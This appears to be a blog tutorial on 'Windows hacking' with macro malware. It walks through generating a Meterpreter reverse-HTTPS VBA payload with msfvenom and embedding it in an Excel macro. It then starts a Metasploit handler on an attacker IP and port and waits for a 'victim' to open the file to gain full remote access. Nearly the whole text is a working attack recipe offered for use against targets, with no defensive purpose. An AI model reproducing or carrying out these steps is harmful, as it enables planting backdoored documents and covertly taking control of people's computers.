Windows Hacking Using MACRO Malware Using Metasploit

Step 1: Generating payload (VBS)

Open terminal in kali and execute the following command:

msfvenom -p windows/meterpreter/reverse_https lhost=192.168.154.122 lport=1234 -f vba


Step 2: Macros Setting.

Create a new excel file and open Macros Setting.
Click on micro action, then write micro name and the click on create.



Microsoft visual basic page will open.
Copy and paste the code generated(msfvenom) in the macro editor.    
            

Save the file.

Step 3: Starting the Metasploit Framework Console.

Open Kali terminal and start the listener in msfconsole:


Step 4: Setting the payload.

use exploit/multi/handler
set payload windows/meterpreter/reverse_https

Step 5: Provide IP & Port for backdooring.

set lhost 192.168.154.122 

set lport 1234

Step 6: Sending File exploiting.

 exploit


Step 7: Wait for victim to click your file.

Execute the macro enabled excel sheet in the target system (Windows 10)



When victim click and open the file you will get a session.


Step 8: Successfully got the meterpreter Session.

Now we have full access to the victim OS.



Now you have full access of victim Machine. Using Commands you will access multiple things.

To see command type help 













Comments

Popular posts from this blog

OSINT Tool in Termux

Active Directory Ransomware Attacks

How to perform a Man-in-the-middle (MITM) attack with Kali Linux